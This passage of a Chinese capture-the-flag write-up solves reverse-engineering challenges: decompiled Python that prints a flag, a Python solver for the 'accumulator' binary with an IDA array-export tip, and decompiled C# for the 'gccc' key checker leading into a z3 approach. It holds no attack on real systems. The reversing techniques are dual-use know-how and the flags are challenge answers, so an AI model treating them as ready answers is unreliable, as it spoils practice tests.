class="se">\x0b</span><span class="s1">cVkx!f)sVY Men</span><span class="se">\x0c\&#39;</span><span class="s1">ujN&lt;&#34;LJ</span><span class="se">\x0c</span><span class="s1">5R4&#34;</span><span class="se">\\\\</span><span class="s1">XPVA</span><span class="se">\&#39;</span><span class="s1">m$~tj)Br}C}&amp;kX2&lt;|</span><span class="se">\n</span><span class="s1">p3XtaHB.P</span><span class="se">\&#39;</span><span class="s1">(E 4$dm!uDyC</span><span class="si">%u</span><span class="s1"> [&#34;x[VYw=1aDJ (8V/a!J?`_r:n7J88!a25AZ]#,ab?{</span><span class="si">%e</span><span class="se">\x0b</span><span class="s1">]wN_}*Q:mh&gt;@]u</span><span class="se">\t</span><span class="s1">&amp;6:Z*Fmr?U`cOHbAf7s@&amp;5~L ,</span><span class="se">\t</span><span class="s1">Q18 -Hg q2nz%</span><span class="se">\x0c</span><span class="s1">cUm=dz&amp;h1(ozoZ)mrA=`HKo</span><span class="se">\n\&#39;</span><span class="s1">rXm}Z-l3]WgN</span><span class="se">\\</span><span class="s1">NW&lt;{o=)[V({7&lt;N1.-A8S&#34;=;3sderb</span><span class="se">\t</span><span class="s1">OZ$K</span><span class="se">\r</span><span class="s1">0o/5</span><span class="se">\x0b</span><span class="s1">Mc76EGCWJ3IQpr7!QhbgzX8uGe3&lt;w-g</span><span class="se">\&#39;</span><span class="s1">/j</span><span class="se">\&#39;\t</span><span class="s1">M4|9l?i&amp;tm_</span><span class="se">\n</span><span class="s1">57X0B2rOpuB@H@%L_</span><span class="se">\r</span><span class="s1">)&amp;/q=LZa(%}&#34;&#34;#if#Kq74xK?`jGFOn&#34;8&amp;^3Q-</span><span class="se">\r</span><span class="s1">#]E$=!b^In0:$4VKPXP0UK=IK)Y</span><span class="se">\r</span><span class="s1">stOT40=?DyHor8j7O</span><span class="se">\\</span><span class="s1">r/~ncJ5];cCT)c?OS0EM5m#V(-%&#34;Tu:!UsE],0Dp s@HErS]J{</span><span class="si">%o</span><span class="s1">H54B&amp;(zE.(@5#2k</span><span class="se">\t</span><span class="s1">JnNlnUEij</span><span class="se">\\</span><span class="s1">.q/3HBpJNk*X(k5;DlqK</span><span class="se">\&#39;\&#39;</span><span class="s1">fX</span><span class="se">\r</span><span class="s1">}EBk_7</span><span class="se">\x0b</span><span class="s1">:&gt;8~</span><span class="se">\t</span><span class="s1">+M@WJx.PO({/U}1}#TqjreG</span><span class="se">\n</span><span class="s1">N{</span><span class="se">\r</span><span class="s1">X&gt;4EsJr0Pn</span><span class="se">\\</span><span class="s1">Z</span><span class="se">\\</span><span class="s1">aL/-U&lt;&lt;{,Q;j</span><span class="se">\t</span><span class="s1">F=7f</span><span class="se">\&#39;</span><span class="s1">)+wH:p{G=_.s</span><span class="se">\\</span><span class="s1">t-</span><span class="se">\x0b</span><span class="s1">I</span><span class="se">\x0c</span><span class="s1">*y</span><span class="se">\t</span><span class="s1">1P:Y|/2xE&lt;uo]~$&gt;5k]FW+&gt;fR&lt;QA&#34;(Fj[LL(hzfQo#PJ;:*0kB~3]9uL[o.xue:VQ</span><span class="se">\t</span><span class="s1">;9-Tu</span><span class="se">\t</span><span class="s1">q|mzzhV_okP</span><span class="se">\t</span><span class="s1">,d</span><span class="se">\r</span><span class="s1">Q`]5Gf</span><span class="se">\x0c</span><span class="s1">#gXB</span><span class="se">\x0c</span><span class="s1">AH|)NI|K=KW-&amp;p-&lt;b&#34;3e.rO</span><span class="se">\x0c</span><span class="s1">uK=</span><span class="se">\x0c</span><span class="s1">^</span><span class="se">\r</span><span class="s1">+MuLxCJ`UKaD</span><span class="se">\x0b</span><span class="s1">BH&amp;n+YVajZ(U7pwWtto3T10VLHwSJ</span><span class="se">\r</span><span class="s1">K</span><span class="se">\t</span><span class="s1">}</span><span class="se">\&#39;</span><span class="s1">F$l1:b2Bd</span><span class="se">\n</span><span class="s1">a=#t0iq}#!{1_)w$}&lt;Dp(borC</span><span class="se">\&#39;\t</span><span class="s1">?r6;,+k;a(Q3@B?RCWYEDrjZe![x=n_%S]rl{&amp;fLr*mgCD;92/nNsaxKy/;</span><span class="se">\n</span><span class="s1">r]sPK=`+YP&gt;MmfB</span><span class="se">\n</span><span class="s1">8O4/&#34;}nE7r*=41f2</span><span class="se">\t</span><span class="s1">37&gt;K</span><span class="se">\&#39;</span><span class="s1">s$wpl;qS[`qzu</span><span class="se">\x0b\t\n</span><span class="s1">uaU|b,C`4&amp; dRN~]7DnuTb2FhNHV!#Z2Hho</span><span class="se">\x0b</span><span class="s1">[%.{O</span><span class="se">\t</span><span class="s1">$q0</span><span class="se">\x0c</span><span class="s1">h_@?w@b8[I^{JL|O8]i8{p)A.w)14qK3JoyF</span><span class="si">%li</span><span class="s1">cZ~ga</span><span class="se">\r</span><span class="s1">W[L:W</span><span class="se">\r</span><span class="s1">tIvfWJjZUOvB</span><span class="se">\r</span><span class="s1">S.Beav3!-@bw|PexJ Pcw1</span><span class="se">\r</span><span class="s1">y6!63B}]J])6fak/3r]W</span><span class="se">\t</span><span class="s1">MeXt[uc(1_U lys{a1X</span><span class="se">\r</span><span class="s1">%)[wwP3rhgNW{*d~_E%Q2htCt5ha@l0^0=</span><span class="se">\x0b</span><span class="s1">wT</span><span class="se">\n</span><span class="s1">i4/V;_</span><span class="se">\n</span><span class="s1">M1rb?w~Q)Dli4u</span><span class="se">\n</span><span class="s1">`}1+D8&#34;</span><span class="se">\t</span><span class="s1">`@V~$9l$Uy**VnI (@Ga0&lt;RxfmoNgJTtE-aLH</span><span class="se">\r</span><span class="s1">E5fMy7rk$)V</span><span class="se">\r</span><span class="s1">L2Fv/AivOa&#34;</span><span class="se">\n</span><span class="s1">uX|70Xrw^D]</span><span class="si">%i</span><span class="s1">%JyT</span><span class="se">\x0c</span><span class="s1">c</span><span class="si">%c</span><span class="s1">wZ/Wbp=IiY;/@nFEe&gt;3=tM;K*`fReGoc5V/Ri?nXZ-RW)</span><span class="se">\&#39;\t</span><span class="s1">&lt;</span><span class="se">\x0c</span><span class="s1">V&gt;@X@-Ei4</span><span class="si">%s</span><span class="s1">O%},B_pjc`s&#34;@oKCmdgDhjUZT@?mb</span><span class="se">\&#39;</span><span class="s1">?Q:F</span><span class="se">\x0b</span><span class="s1">LJkPgjaFAc=rbrjAz$Zz</span><span class="se">\x0c</span><span class="s1">q0GU!&#34;)xFOEF(x!3M</span><span class="se">\t</span><span class="s1">:l83|}}HgGJJ#eT/I</span><span class="se">\x0b</span><span class="s1">[|lK_n+;Wi/N^B4LzL.a(gVWq,zO6</span><span class="se">\&#39;</span><span class="s1">S|tb&gt;RX` ca*CO&lt;w</span><span class="se">\x0c</span><span class="s1">i =wc1,M~</span><span class="se">\x0b</span><span class="s1">c`FYEs</span><span class="se">\r</span><span class="s1">){+Ll8[I9-88m</span><span class="se">\t\\</span><span class="s1">iK/</span><span class="se">\\</span><span class="s1">hno-C[vX*3Hx:%:K</span><span class="se">\r</span><span class="s1">t</span><span class="se">\x0c</span><span class="s1">W!tj</span><span class="se">\&#39;</span><span class="s1">SOhqxP|k7cw Hm?I@?P</span><span class="se">\&#39;</span><span class="s1">HmapG7$0#T(Auz]sjmd#</span><span class="se">\r</span><span class="s1">FP/}53@-Kvmi(d</span><span class="si">%d</span><span class="s1">ZKLZ2LK</span><span class="se">\&#39;</span><span class="s1">e_E</span><span class="se">\x0b</span><span class="s1">QmR 5/(irq4-EUyp&lt;hB?[</span><span class="se">\t</span><span class="s1">nU:p*xuzASM&#39;</span> <span class="n">Y</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">f</span><span class="p">:</span> <span class="p">(</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span> <span class="n">x</span><span class="p">(</span><span class="n">x</span><span class="p">))(</span><span class="k">lambda</span> <span class="n">y</span><span class="p">:</span> <span class="n">f</span><span class="p">(</span><span class="k">lambda</span> <span class="o">*</span><span class="n">args</span><span class="p">:</span> <span class="n">y</span><span class="p">(</span><span class="n">y</span><span class="p">)(</span><span class="o">*</span><span class="n">args</span><span class="p">)))</span> <span class="n">fun</span> <span class="o">=</span> <span class="k">lambda</span> <span class="n">f</span><span class="p">:</span> <span class="k">lambda</span> <span class="n">n</span><span class="p">:</span> <span class="p">(</span><span class="mi">1</span> <span class="k">if</span> <span class="n">n</span> <span class="o">&lt;</span> <span class="mi">3</span> <span class="k">else</span> <span class="n">f</span><span class="p">(</span><span class="n">n</span> <span class="o">-</span> <span class="mi">1</span><span class="p">)</span> <span class="o">+</span> <span class="n">f</span><span class="p">(</span><span class="n">n</span> <span class="o">-</span> <span class="mi">2</span><span class="p">))</span> <span class="k">print</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">((</span><span class="n">gg</span><span class="p">[</span><span class="n">Y</span><span class="p">(</span><span class="n">fun</span><span class="p">)(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">2</span><span class="p">)]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">16</span><span class="p">)))</span> <span class="o">%</span> <span class="s1">&#39;&#39;</span><span class="o">.</span><span class="n">join</span><span class="p">((</span><span class="n">data</span><span class="p">[</span><span class="nb">pow</span><span class="p">((</span><span class="n">gcd</span><span class="p">(</span><span class="n">z</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="mi">5</span><span class="p">],</span> <span class="n">z</span><span class="p">[(</span><span class="n">i</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">%</span> <span class="mi">5</span><span class="p">])</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">g</span><span class="p">,</span> <span class="n">F</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="mi">5</span><span class="p">]</span> <span class="o">*</span> <span class="p">(</span><span class="n">i</span> <span class="o">*</span> <span class="mi">2</span> <span class="o">+</span> <span class="mi">1</span><span class="p">),</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">))]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">)))</span> <span class="c1"># Y = lambda f: (lambda x: x(x))(lambda y: f(lambda *args: y(y)(*args)))</span> <span class="c1"># fac = lambda f: lambda n: (1 if n&lt;2 else n*f(n-1))</span> <span class="c1"># &gt;&gt;&gt; [ Y(fac)(i) for i in range(10) ]</span> <span class="c1"># [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880]</span> <span class="c1"># &gt;&gt;&gt; fib = lambda f: lambda n: 0 if n == 0 else (1 if n == 1 else f(n-1) + f(n-2))</span> <span class="c1"># &gt;&gt;&gt; [ Y(fib)(i) for i in range(10) ]</span> <span class="c1"># [0, 1, 1, 2, 3, 5, 8, 13, 21, 34]</span> <span class="c1"># okay decompiling pyyy.pyc</span> </code></pre></td></tr></table> </div> </div><p>运行即可</p> <h3 id="0x04-accumulator">0x04 accumulator</h3> <p>这个题目中check函数的F5代码有点混乱，单看伪代码很难分析，但通过调试可以快速确定check函数的整体流程是对输入的每一位求和，然后与0x601080这个数组进行比较，在这个过程中更新0x6013C0和0x6013B0两个全局变量用于寻址，程序的整体流程是先check(sha512(input))，然后check(input)，因为sha512是哈希函数，因此放弃了逆向求解。仔细分析，在check(input)时，使用的也是对input每一位求和，然后与数组比较的方法，而与第一次check(sha512(input))相比仅仅是两个用于寻址的全局变量不同，这样我们只要对数组逐位做差即可</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="mi">195</span><span class="p">,</span> <span class="mi">255</span><span class="p">,</span> <span class="mi">493</span><span class="p">,</span> <span class="mi">584</span><span class="p">,</span> <span class="mi">799</span><span class="p">,</span> <span class="mi">929</span><span class="p">,</span> <span class="mi">946</span><span class="p">,</span> <span class="mi">1086</span><span class="p">,</span> <span class="mi">1180</span><span class="p">,</span> <span class="mi">1184</span><span class="p">,</span> <span class="mi">1421</span><span class="p">,</span> <span class="mi">1595</span><span class="p">,</span> <span class="mi">1805</span><span class="p">,</span> <span class="mi">1846</span><span class="p">,</span> <span class="mi">2081</span><span class="p">,</span> <span class="mi">2320</span><span class="p">,</span> <span class="mi">2430</span><span class="p">,</span> <span class="mi">2605</span><span class="p">,</span> <span class="mi">2727</span><span class="p">,</span> <span class="mi">2972</span><span class="p">,</span> <span class="mi">3213</span><span class="p">,</span> <span class="mi">3403</span><span class="p">,</span> <span class="mi">3418</span><span class="p">,</span> <span class="mi">3649</span><span class="p">,</span> <span class="mi">3712</span><span class="p">,</span> <span class="mi">3950</span><span class="p">,</span> <span class="mi">3989</span><span class="p">,</span> <span class="mi">4193</span><span class="p">,</span> <span class="mi">4228</span><span class="p">,</span> <span class="mi">4394</span><span class="p">,</span> <span class="mi">4523</span><span class="p">,</span> <span class="mi">4624</span><span class="p">,</span> <span class="mi">4706</span><span class="p">,</span> <span class="mi">4935</span><span class="p">,</span> <span class="mi">4999</span><span class="p">,</span> <span class="mi">5072</span><span class="p">,</span> <span class="mi">5106</span><span class="p">,</span> <span class="mi">5291</span><span class="p">,</span> <span class="mi">5510</span><span class="p">,</span> <span class="mi">5536</span><span class="p">,</span> <span class="mi">5644</span><span class="p">,</span> <span class="mi">5751</span><span class="p">,</span> <span class="mi">5993</span><span class="p">,</span> <span class="mi">6118</span><span class="p">,</span> <span class="mi">6126</span><span class="p">,</span> <span class="mi">6198</span><span class="p">,</span> <span class="mi">6211</span><span class="p">,</span> <span class="mi">6410</span><span class="p">,</span> <span class="mi">6469</span><span class="p">,</span> <span class="mi">6609</span><span class="p">,</span> <span class="mi">6647</span><span class="p">,</span> <span class="mi">6752</span><span class="p">,</span> <span class="mi">6978</span><span class="p">,</span> <span class="mi">7010</span><span class="p">,</span> <span class="mi">7053</span><span class="p">,</span> <span class="mi">7106</span><span class="p">,</span> <span class="mi">7274</span><span class="p">,</span> <span class="mi">7468</span><span class="p">,</span> <span class="mi">7563</span><span class="p">,</span> <span class="mi">7673</span><span class="p">,</span> <span class="mi">7706</span><span class="p">,</span> <span class="mi">7956</span><span class="p">,</span> <span class="mi">8146</span><span class="p">,</span> <span class="mi">8187</span><span class="p">,</span> <span class="mi">8257</span><span class="p">,</span> <span class="mi">8333</span><span class="p">,</span> <span class="mi">8398</span><span class="p">,</span> <span class="mi">8469</span><span class="p">,</span> <span class="mi">8592</span><span class="p">,</span> <span class="mi">8640</span><span class="p">,</span> <span class="mi">8693</span><span class="p">,</span> <span class="mi">8742</span><span class="p">,</span> <span class="mi">8793</span><span class="p">,</span> <span class="mi">8844</span><span class="p">,</span> <span class="mi">8901</span><span class="p">,</span> <span class="mi">8953</span><span class="p">,</span> <span class="mi">9007</span><span class="p">,</span> <span class="mi">9062</span><span class="p">,</span> <span class="mi">9113</span><span class="p">,</span> <span class="mi">9161</span><span class="p">,</span> <span class="mi">9215</span><span class="p">,</span> <span class="mi">9317</span><span class="p">,</span> <span class="mi">9374</span><span class="p">,</span> <span class="mi">9429</span><span class="p">,</span> <span class="mi">9483</span><span class="p">,</span> <span class="mi">9540</span><span class="p">,</span> <span class="mi">9591</span><span class="p">,</span> <span class="mi">9644</span><span class="p">,</span> <span class="mi">9692</span><span class="p">,</span> <span class="mi">9741</span><span class="p">,</span> <span class="mi">9792</span><span class="p">,</span> <span class="mi">9846</span><span class="p">,</span> <span class="mi">9944</span><span class="p">,</span> <span class="mi">9996</span><span class="p">,</span> <span class="mi">10045</span><span class="p">,</span> <span class="mi">10144</span><span class="p">,</span> <span class="mi">10195</span><span class="p">,</span> <span class="mi">10246</span><span class="p">,</span> <span class="mi">10294</span><span class="p">,</span> <span class="mi">10350</span><span class="p">,</span> <span class="mi">10402</span><span class="p">,</span> <span class="mi">10450</span><span class="p">,</span> <span class="mi">10551</span><span class="p">,</span> <span class="mi">10652</span><span class="p">,</span> <span class="mi">10750</span><span class="p">,</span> <span class="mi">10849</span><span class="p">,</span> <span class="mi">10946</span><span class="p">,</span> <span class="mi">11045</span><span class="p">,</span> <span class="mi">11096</span><span class="p">,</span> <span class="mi">11147</span><span class="p">,</span> <span class="mi">11202</span><span class="p">,</span> <span class="mi">11304</span><span class="p">,</span> <span class="mi">11353</span><span class="p">,</span> <span class="mi">11451</span><span class="p">,</span> <span class="mi">11507</span><span class="p">,</span> <span class="mi">11605</span><span class="p">,</span> <span class="mi">11653</span><span class="p">,</span> <span class="mi">11753</span><span class="p">,</span> <span class="mi">11852</span><span class="p">,</span> <span class="mi">11900</span><span class="p">,</span> <span class="mi">11951</span><span class="p">,</span> <span class="mi">12052</span><span class="p">,</span> <span class="mi">12105</span><span class="p">,</span> <span class="mi">12161</span><span class="p">,</span> <span class="mi">12259</span><span class="p">,</span> <span class="mi">12360</span><span class="p">,</span> <span class="mi">12409</span><span class="p">,</span> <span class="mi">12461</span><span class="p">,</span> <span class="mi">12563</span><span class="p">,</span> <span class="mi">12664</span><span class="p">,</span> <span class="mi">12718</span><span class="p">,</span> <span class="mi">12775</span><span class="p">,</span> <span class="mi">12823</span><span class="p">,</span> <span class="mi">12921</span><span class="p">,</span> <span class="mi">12970</span><span class="p">,</span> <span class="mi">13020</span><span class="p">,</span> <span class="mi">13071</span><span class="p">,</span> <span class="mi">13173</span><span class="p">,</span> <span class="mi">13227</span><span class="p">,</span> <span class="mi">13276</span><span class="p">,</span> <span class="mi">13374</span><span class="p">,</span> <span class="mi">13422</span><span class="p">,</span> <span class="mi">13521</span><span class="p">,</span> <span class="mi">13569</span><span class="p">,</span> <span class="mi">13667</span><span class="p">,</span> <span class="mi">13718</span><span class="p">,</span> <span class="mi">13771</span><span class="p">,</span> <span class="mi">13873</span><span class="p">,</span> <span class="mi">13972</span><span class="p">,</span> <span class="mi">14029</span><span class="p">,</span> <span class="mi">14080</span><span class="p">,</span> <span class="mi">14179</span><span class="p">,</span> <span class="mi">14278</span><span class="p">,</span> <span class="mi">14377</span><span class="p">,</span> <span class="mi">14432</span><span class="p">,</span> <span class="mi">14482</span><span class="p">,</span> <span class="mi">14531</span><span class="p">,</span> <span class="mi">14579</span><span class="p">,</span> <span class="mi">14627</span><span class="p">,</span> <span class="mi">14679</span><span class="p">,</span> <span class="mi">14732</span><span class="p">,</span> <span class="mi">14789</span><span class="p">,</span> <span class="mi">14840</span><span class="p">,</span> <span class="mi">14894</span><span class="p">,</span> <span class="mi">14951</span><span class="p">,</span> <span class="mi">15052</span><span class="p">,</span> <span class="mi">15154</span><span class="p">,</span> <span class="mi">15210</span><span class="p">,</span> <span class="mi">15263</span><span class="p">,</span> <span class="mi">15314</span><span class="p">,</span> <span class="mi">15363</span><span class="p">,</span> <span class="mi">15460</span><span class="p">,</span> <span class="mi">15509</span><span class="p">,</span> <span class="mi">15610</span><span class="p">,</span> <span class="mi">15666</span><span class="p">,</span> <span class="mi">15763</span><span class="p">,</span> <span class="mi">15818</span><span class="p">,</span> <span class="mi">15916</span><span class="p">,</span> <span class="mi">15968</span><span class="p">,</span> <span class="mi">16018</span><span class="p">,</span> <span class="mi">16075</span><span class="p">,</span> <span class="mi">16132</span><span class="p">,</span> <span class="mi">16233</span><span class="p">,</span> <span class="mi">16288</span><span class="p">,</span> <span class="mi">16386</span><span class="p">,</span> <span class="mi">16443</span><span class="p">,</span> <span class="mi">16543</span><span class="p">,</span> <span class="mi">16600</span><span class="p">,</span> <span class="mi">16655</span><span class="p">,</span> <span class="mi">16703</span><span class="p">,</span> <span class="mi">16801</span><span class="p">,</span> <span class="mi">16858</span><span class="p">,</span> <span class="mi">16955</span><span class="p">,</span> <span class="mi">17005</span><span class="p">,</span> <span class="mi">17056</span><span class="p">,</span> <span class="mi">17153</span><span class="p">,</span> <span class="mi">17250</span><span class="p">,</span> <span class="mi">17375</span><span class="p">]</span> <span class="n">flag</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)):</span> <span class="n">flag</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">-</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span> <span class="o">-</span> <span class="mi">1</span><span class="p">])</span> <span class="k">print</span> <span class="n">flag</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>再介绍一个IDA使用的trick，在提取数组时，先在数组的第一位上点d，使数组的类型转换成dd，然后再点a，使IDA把这一段连续的数据转成数组，然后可以使用alt+L快速选中数组范围（alt+L，鼠标滚轮，afl+L），然后通过shift+E就可以快速导出我们想要选择的数据了</p> </blockquote> <h3 id="0x05-gccc">0x05 gccc</h3> <p>该题的逻辑很简单,只有一个输入,下载文件后发现gccc.exe为.Net(C#)架构,因此用C#的反编译工具(这里用了)反编译得到题目代码如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C#" data-lang="C#"><span class="c1">// GrayCCC </span><span class="c1"></span><span class="k">public</span> <span class="k">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">()</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">Write</span><span class="p">(</span><span class="s">&#34;Input the key: &#34;</span><span class="p">);</span> <span class="kt">uint</span> <span class="n">num</span><span class="p">;</span> <span class="k">if</span> <span class="p">(!</span><span class="kt">uint</span><span class="p">.</span><span class="n">TryParse</span><span class="p">(</span><span class="n">Console</span><span class="p">.</span><span class="n">ReadLine</span><span class="p">().</span><span class="n">Trim</span><span class="p">(),</span> <span class="k">out</span> <span class="n">num</span><span class="p">))</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Invalid key&#34;</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="kt">string</span> <span class="n">text</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> <span class="kt">string</span> <span class="n">text2</span> <span class="p">=</span> <span class="s">&#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ{} &#34;</span><span class="p">;</span> <span class="kt">int</span> <span class="n">num2</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="kt">byte</span><span class="p">[]</span> <span class="n">array</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[]</span> <span class="p">{</span> <span class="m">164</span><span class="p">,</span> <span class="m">25</span><span class="p">,</span> <span class="m">4</span><span class="p">,</span> <span class="m">130</span><span class="p">,</span> <span class="m">126</span><span class="p">,</span> <span class="m">158</span><span class="p">,</span> <span class="m">91</span><span class="p">,</span> <span class="m">199</span><span class="p">,</span> <span class="m">173</span><span class="p">,</span> <span class="m">252</span><span class="p">,</span> <span class="m">239</span><span class="p">,</span> <span class="m">143</span><span class="p">,</span> <span class="m">150</span><span class="p">,</span> <span class="m">251</span><span class="p">,</span> <span class="m">126</span><span class="p">,</span> <span class="m">39</span><span class="p">,</span> <span class="m">104</span><span class="p">,</span> <span class="m">104</span><span class="p">,</span> <span class="m">146</span><span class="p">,</span> <span class="m">208</span><span class="p">,</span> <span class="m">249</span><span class="p">,</span> <span class="m">9</span><span class="p">,</span> <span class="m">219</span><span class="p">,</span> <span class="m">208</span><span class="p">,</span> <span class="m">101</span><span class="p">,</span> <span class="m">182</span><span class="p">,</span> <span class="m">62</span><span class="p">,</span> <span class="m">92</span><span class="p">,</span> <span class="m">6</span><span class="p">,</span> <span class="m">27</span><span class="p">,</span> <span class="m">5</span><span class="p">,</span> <span class="m">46</span> <span class="p">};</span> <span class="kt">byte</span> <span class="n">b</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">num</span> <span class="p">!=</span> <span class="m">0</span><span class="n">u</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">c</span> <span class="p">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)(</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="p">^</span> <span class="p">(</span><span class="kt">byte</span><span class="p">)</span><span class="n">num</span> <span class="p">^</span> <span class="n">b</span><span class="p">);</span> <span class="k">if</span> <span class="p">(!</span><span class="n">text2</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="k">new</span> <span class="kt">string</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="m">1</span><span class="p">)))</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Invalid key&#34;</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">text</span> <span class="p">+=</span> <span class="n">c</span><span class="p">;</span> <span class="n">b</span> <span class="p">^=</span> <span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">++];</span> <span class="n">num</span> <span class="p">&gt;&gt;=</span> <span class="m">1</span><span class="p">;</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">5</span><span class="p">)</span> <span class="p">!=</span> <span class="s">&#34;FLAG{&#34;</span> <span class="p">||</span> <span class="n">text</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="m">31</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span> <span class="p">!=</span> <span class="s">&#34;}&#34;</span><span class="p">)</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Invalid key&#34;</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Your flag is: &#34;</span> <span class="p">+</span> <span class="n">text</span><span class="p">);</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><p>可以看到,逻辑很简单,对输入进行了32轮验证,通过每一层验证即可得到flag.</p> <p>但逻辑简单并不意味着容易解决,仔细分析代码可以看出解题的关键在求出num的值,num经过32次右移一位后等于0,因此取值范围为**[2 ^ 31, 2 ^ 32)**, 在该范围内找到满足32轮验证的值即可,但在找到该值时遇到了问题,如果单纯爆破的话,2 ^ 32 - 2 ^ 31次爆破远远超出了能接受的范围,因此考虑用z3来解决这个多约束问题.</p> <p>该题的约束条件有如下几个:</p> <ul> <li>0~5位为&quot;FLAG{&rdquo;</li> <li>最后一位(31)为&rdquo;}&rdquo;</li> <li>6~30位需在&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZ{} &ldquo;内</li> </ul> <p>因此可以写出z3的代码如下:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span 